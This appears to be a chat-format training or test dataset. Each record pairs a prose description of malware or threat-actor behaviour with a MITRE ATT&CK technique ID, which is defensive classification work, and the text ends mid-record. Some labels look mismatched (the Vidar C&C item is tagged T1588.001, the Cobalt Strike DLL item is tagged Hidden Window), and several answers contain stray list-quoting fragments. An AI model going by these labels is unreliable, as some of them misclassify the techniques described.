- "role": "user",
- "content": "NCCIC observed multiple methods used by NotPetya to propagate across a network. The first and—in most cases—most effective method, uses a modified version of the Mimikatz tool to steal the user’s Windows credentials. The cyber threat actor can then use the stolen credentials, along with the native Windows Management Instrumentation Command Line (WMIC) tool or the Microsoft SysInternals utility, psexec.exe, to access other systems on the network. Another method for propagation uses the EternalBlue exploit tool to target unpatched systems running a vulnerable version of SMBv1. In this case, the malware attempts to identify other hosts on the network by checking the compromised system’s IP physical address mapping table. Next, it scans for other systems that are vulnerable to the SMB exploit and installs the malicious payload. Refer to the malware report, MIFR-10130295, for more details on these methods"
- },
- {
- "role": "assistant",
- "content": "T1210 - Exploitation of Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In the obfuscated and packed version of the loader, an uncommon API call is used to facilitate code injection. As seen in the image below, the loader uses VirtualAllocExNuma to allocate new memory and store the returned base address. The beginning of an obfuscated shellcode is copied to this address after being decrypted using an RC4 algorithm.In addition to the shellcode an additional PE can be seen in memory"
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RobbinHood will search for an RSA encryption key and then perform its encryption process on the system files."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Its presence on a compromised system allows a threat actor to spawn a reverse shell, upload or download files, and capture keystrokes"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FLASHFLOOD achieves persistence by making an entry in the Registry's Run key."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MiniDuke can use DGA to generate new Twitter URLs for C2."
- },
- {
- "role": "assistant",
- "content": "T1568.002 - Domain Generation Algorithms"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has registered a Windows shell script under the Registry key HKCU\\Environment\\UserInitMprLogonScript to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1037 - Boot or Logon Initialization Scripts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Vidar can also receive settings from the C&C that tells it exactly what to do."
- },
- {
- "role": "assistant",
- "content": "T1588.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CrackMapExec can dump hashed passwords from LSA secrets for the targeted system."
- },
- {
- "role": "assistant",
- "content": "T1003.004 - OS Credential Dumping: LSA Secrets"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "mailsearcher32 module This module searches the infected system’s files to gather email addresses for information-stealing purposes. Emotet, according to previous research by Brad Duncan, is also responsible for delivering this password-grabbing Trickbot variant, as well as Azorult, to users"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery', 'T1087.003 - Email Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Rundll32Call exported function begins by creating a named event named ‘RunOnce’. This event ensures that only a single instance of DDKong is executed at a given time. If this is the only instance of DDKong running at the time, the malware continues. This ensures that only a single instance of DDKong is executed at a given time. DDKong attempts to decode an embedded configuration using a single byte XOR key of 0xC3. Once decoded, the configuration contains the data shown in Figure 5 below"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 uses the Invoke-Obfuscation framework to obfuscate their PowerShell and also performs other code obfuscation. APT32 has also encoded payloads using Base64 and a framework called \"Dont-Kill-My-Cat (DKMC). APT32 also encrypts the library used for network exfiltration with AES-256 in CBC mode in their macOS backdoor."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IceApple can use Base64 and \"junk\" JavaScript code to obfuscate information."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can use Rundll32 to execute additional payloads."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Reaver creates a shortcut file and saves it in a Startup folder to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Find out all system information, including hardware being used and the exact version of your operating system, including security patches. Steal from your clipboard (things you’ve copied) - Control your printer - Lock/Restart/Shutdown your computer - Update the implant with a new address to beacon to or new functionality"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor gave considerable effort to obfuscating the code of this new Anchor_DNS variant using stack strings, string encryption, and by implementing a packer. The following example shows considerable changes in the code of the WinMain() function between an older variant of Anchor_DNS and the new variant"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RedLeaves attempts to add a shortcut file in the Startup folder to achieve persistence. If this fails, it attempts to add Registry Run keys."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ebury can disable SELinux Role-Based Access Control and deactivate PAM modules."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When run, the first thing the script does is to retrieve a GUID associated to a LAN connection present on the machine by leveraging the interface offered by the WMI Class Root\\Microsoft\\Homenet\\HNet_Connection. If a LAN connection is not available, the script defaults to a hardcoded GUID. This GUID is later communicated to the C2. It’s possible that the threat actor used this GUID to verify that the threat is running in a desirable environment, i.e. a real machine with LAN connections available"
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Multiple SUNBURST samples have been recovered, delivering different payloads. In at least one instance the attackers deployed a previously unseen memory-only dropper we’ve dubbed TEARDROP to deploy Cobalt Strike BEACON"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dyre has the ability to identify network settings on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "All versions generate a list of files to encrypt by parsing the available drives and directories, but will avoid adding files that are of relevance to the malware"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a command to take a screenshot and send it to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BADNEWS copies documents under 15MB found on the victim system to is the user's \"%temp%\\SMB\\\" folder. It also copies files from USB devices to a predefined directory."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In the case of the observed exploit, specifically when handling Microsoft PowerPoint files, the packagers allows a Package OLE object to reference arbitrary external files, such as INF files, from untrusted sources. This will cause the referenced files to be downloaded in the case of INF files, to be executed with specific commands - An attacker can exploit this vulnerability to execute arbitrary code but will need a specifically crafted file and use social engineering methods (observed in this campaign) to convince a user to open it"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The first stage logic is performed by ‘mklgsecondary’ which serves the purpose of downloading a file named ‘chrome.txt’ from a C2 server using the BITS utility. The downloader modifies the Chrome shortcut using the same method previously described for the Telegram variant. The downloaded PE file (‘chrome.txt’/’mklgchrome’) gets executed each time the user starts Chrome, thereby running the real Chrome application as well as executing the MarkiRAT payload"
- },
- {
- "role": "assistant",
- "content": "T1197 - BITS Jobs', 'T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Crimson contains a module to steal credentials from Web browsers on the victim machine."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once installed, JSSLoader provides the threat group with a backdoor to the victim’s computer and the organization"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File', 'T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Higaisa has called various native OS APIs."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "transferred compressed and encrypted RAR files containing exfiltration through the established backdoor command and control channel during operations."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of executing commands via cmd.exe."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "establishes persistence by adding a Registry Run key."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware platform can use Windows admin shares to move laterally."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "By doing so, the main content of the macro itself (Figure 2) can be kept relatively simple, and the malicious’ codes small footprint can help enable evasion of automated detection mechanisms based on macro content"
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Honeybee, the threat actors deployed the MaoCheng dropper with a stolen Adobe Systems digital signature."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leviathan has used an uploader known as LUNCHMONEY that can exfiltrate files to Dropbox."
- },
- {
- "role": "assistant",
- "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bisonal has encoded binary data with Base64 and ASCII."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Netwalker can detect and terminate active security software-related processes on infected systems."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery', 'T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "attempts to avoid detection by checking a first stage command and control server to determine if it should connect to the second stage server, which performs \"louder\" interactions with the malware."
- },
- {
- "role": "assistant",
- "content": "T1104 - Multi-Stage Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kessel has exfiltrated information gathered from the infected system to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "STARWHALE can collect data from an infected local host."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT1 used publicly available malware for privilege escalation."
- },
- {
- "role": "assistant",
- "content": "T1588.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The REvil (also known as Sodinokibi) ransomware was first identified on April 17, 2019. It is used by the financially motivated GOLD SOUTHFIELD threat group, which distributes ransomware via exploit kits, scan-and-exploit techniques, RDP servers, and backdoored software installers. Secureworks® Counter Threat Unit™ (CTU) analysis suggests that REvil is likely associated with the GandCrab ransomware due to similar code and the emergence of REvil as GandCrab activity declined. CTU™ researchers attribute GandCrab to the GOLD GARDEN threat group"
- },
- {
- "role": "assistant",
- "content": "T1195.002 - Compromise Software Supply Chain"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To initially gain access to the environment, Managed Defense analysts identified that FIN6 compromised an internet facing system. Following the compromise of this system, analysts identified FIN6 leveraged stolen credentials to move laterally within the environment using the Windows’ Remote Desktop Protocol (RDP"
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory', 'T1021.001 - Remote Services: Remote Desktop Protocol', 'T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ObliqueRAT can check for blocklisted usernames on infected endpoints."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pass-The-Hash Toolkit can perform pass the hash."
- },
- {
- "role": "assistant",
- "content": "T1550.002 - Use Alternate Authentication Material: Pass the Hash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When a victim opens the document, Microsoft Word asks to enable/disable macros. It reveals that a macro is embedded in the document"
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Essentially, the TDSS botnet kad.dll module is more or less the same as cmd.dll in terms of control function. By running nodes.dat files containing a list of IP addresses of Kad clients in addition to ktzerlrules, which contains a command to download a new nodes.dat file from cybercriminal servers, the owners of the botnet can both include their infected computers in the publicly accessible Kad network and remove them from the network. The publicly accessible Kad network contains no more than 10 TDSS infected computers. This makes replacing the ktzerules file as inefficient as possible, which prevents other cybercriminals from taking control over the botnet. The total number of TDSS infected computers on the closed network number tens of thousands."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1588.001 - Malware', 'T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In this case, a Cobalt Strike DLL file was sent through Bazar C2 traffic and saved to the infected Windows host under the user’s AppData\\Roaming directory"
- },
- {
- "role": "assistant",
- "content": "T1564.003 - Hide Artifacts: Hidden Window"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If it is successful then it will send out basic host information and await further commands."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has used a Powershell cmdlet to grant the \"ApplicationImpersonation\" role to a compromised account."
- },
- {
- "role": "assistant",
- "content": "T1098.002 - Account Manipulation: Additional Email Delegate Permissions"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RainyDay has the ability to switch between TCP and HTTP for C2 if one method is not working."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A format string that defaults to “public/Publics” that modifies characteristics of the folder and hide it from the infected user"
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This backdoor adds the following registry entries to enable its automatic execution at every system startup"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GALLIUM dropped additional tools to victims during their operation, including portqry.exe, a renamed cmd.exe file, winrar, and HTRAN."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can attempt to run the program as admin, then show a fake error message and a legitimate UAC bypass prompt to the user in an attempt to socially engineer the user into escalating privileges."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Talos has uncovered documents that we assess with moderate confidence are associated with suspected persistent threat actor MuddyWater. MuddyWater has been active since at least November 2017 and has been known to primarily target entities in the Middle East. The \"Blackwater.bas\" macro was obfuscated using a substitution cipher whereby the characters are replaced with their corresponding integer. The clear text version of the crf.txt file closely resembled the PowerShell agent that was previously used by the MuddyWater actors when they targeted Kurdish political groups and organizations in Turkey. The screenshot below shows the first few lines of the PowerShell trojan. Notably, a number of the PowerShell commands used to enumerate the host appear to be derived from a GitHub projected called FruityC2. rCecms=BlackWater\". Notably, the trojanized document's macro was also called \"BlackWater,\" and the value \"BlackWater\" was hard coded into the PowerShell script. Most of the PowerShell commands would call Windows Management Instrumentation (WMI) and then query the following information"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group malware uses cmd.exe to execute commands on victims."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This final payload is the ThreatNeedle loader running in memory. At this point the loader uses a different RC4 key (3D 68 D0 0A B1 0E C6 AF DD EE 18 8E F4 A1 D6 20), and the dropped malware is registered as a Windows service and launched"
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla has infected victims using watering holes."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has intentionally deleted computer files to cover their tracks, including with use of the program CCleaner."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a command to collect the victim's IP address."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As part of the anti-debugging or anti-monitoring techniques, ShellTea iterates over all the running processes, applies CRC32 on each process name (after converting the string to capital letters), and then compares the value against a predefined set of CRCs."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware used in a DUBNIUM attack is committed to disguising itself as Secure Shell (SSH) tool. The file descriptions and other properties of the malware look convincingly legitimate at first glance"
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Winnti for Linux has used a passive listener, capable of identifying a specific magic value before executing tasking, as a secondary command and control (C2) mechanism."
- },
- {
- "role": "assistant",
- "content": "T1205 - Traffic Signaling"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ursnif droppers have used VBA macros to download and execute the malware's full executable payload."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
